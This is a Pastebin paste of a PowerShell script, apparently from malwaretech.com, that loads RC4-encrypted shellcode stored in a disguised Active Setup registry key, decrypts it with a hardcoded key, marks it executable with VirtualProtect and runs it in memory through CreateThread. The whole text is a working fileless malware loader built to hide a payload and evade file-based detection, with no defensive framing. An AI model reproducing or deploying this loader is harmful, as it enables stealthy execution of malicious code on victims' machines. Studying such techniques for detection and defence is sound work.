Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Read And Execute Rc4 Encrypted ShellCode From The Registry
- # Set Registry Key
- $sRegistryKey = 'HKCU:\Software\Microsoft\Active Setup\Installed Components\{72507C54-3577-4830-815B-310007F6135A}';
- # Set Key For Key Stream
- [Byte[]]$bKey = [System.Text.Encoding]::ASCII.GetBytes("Phase");
- # Import Native Functions
- $sCode = @"
- [DllImport("kernel32.dll")]
- public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, Byte[] lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
- [DllImport("kernel32.dll")]
- public static extern bool VirtualProtect(Byte[] lpAddress, uint dwSize, uint flNewProtect, [Out] IntPtr lpflOldProtect);
- [DllImport("kernel32.dll")]
- public static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
- "@
- # Make The Code Recognized By PowerShell
- $pFunctions = Add-Type -memberDefinition $sCode -Name "Win32" -namespace Win32Functions -passthru
- # Declare Shellcode Array
- [Byte[]]$bShellCode;
- # Check Pointer Size To Check If x64
- if ([IntPtr]::Size -eq 8) {
- # Load Encrypted x64 Shellcode From Registry
- $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded64).Rc4Encoded64;
- }else{
- # Load Encrypted x86 Shellcode From Registry
- $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded32).Rc4Encoded32;
- }
- # Define Byte Arrays That Are The Boxes
- [Byte[]]$s = New-Object Byte[] 256;
- [Byte[]]$k = New-Object Byte[] 256;
- # Loop from 0 to 255 to fill the boxes
- for ($i = 0; $i -lt 256; $i++){
- # Fill Box S With 0-255
- $s[$i] = [Byte]$i;
- # Fill Box K With (0-255)/dwKeyLen
- $k[$i] = $bKey[$i % $bKey.Length];
- }
- # Initialize j
- $j = 0;
- # Loop Through All 256 Bytes
- for ($i = 0; $i -lt 256; $i++){
- $j = ($j + $s[$i] + $k[$i]) % 256;
- # Hold Temporary Value Of S[i] For Swapping
- $bSwap = $s[$i];
- # Set S[i] With S[j]
- $s[$i] = $s[$j];
- # Set S[j] With Old Value Of S[i]
- $s[$j] = $bSwap;
- }
- # Initialize i
- $i = 0;
- # Initialize j
- $j = 0;
- # Loop Through The Bytes In The Buffer
- for ($x = 0; $x -lt $bShellCode.Length; $x++){
- # Pseudo-Random Generation Algorithm
- $i = ($i + 1) % 256;
- $j = ($j + $s[$i]) % 256;
- # Hold Temporary Value Of S[i] For Swapping
- $bSwap = $s[$i];
- # Set S[i] With S[j]
- $s[$i] = $s[$j];
- # Set S[j] With Old Value Of S[i]
- $s[$j] = $bSwap;
- [int]$t = ($s[$i] + $s[$j]) % 256;
- # Xor PlainText With KeyStream
- $bShellCode[$x] = $bShellCode[$x] -bxor $s[$t];
- }
- # Check What Size We Should Allocate
- $dwSize = $bShellCode.Length;
- # Check Size Of ShellCode
- if ($dwSize -gt 0x00000000){
- # Variable To Hold Old Protection Flags
- [Int[]]$dwOldProt = 0x00000000;
- # Get Pointer To $dwOldProt
- $pdwOldProt = [System.Runtime.InteropServices.Marshal]::UnsafeAddrOfPinnedArrayElement($dwOldProt,0)
- # Set Read/Write/Execute Flags On ShellCode
- if ($pFunctions::VirtualProtect($bShellCode, $dwSize, 0x40, $pdwOldProt)){
- # Create A New Thread To Execute Our ShellCode
- $hThread = $pFunctions::CreateThread(0, 0, $bShellCode, 0, 0, 0);
- # Wait For Our Thread
- $pFunctions::WaitForSingleObject($hThread, -1);
- }
- }
- www.malwaretech.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement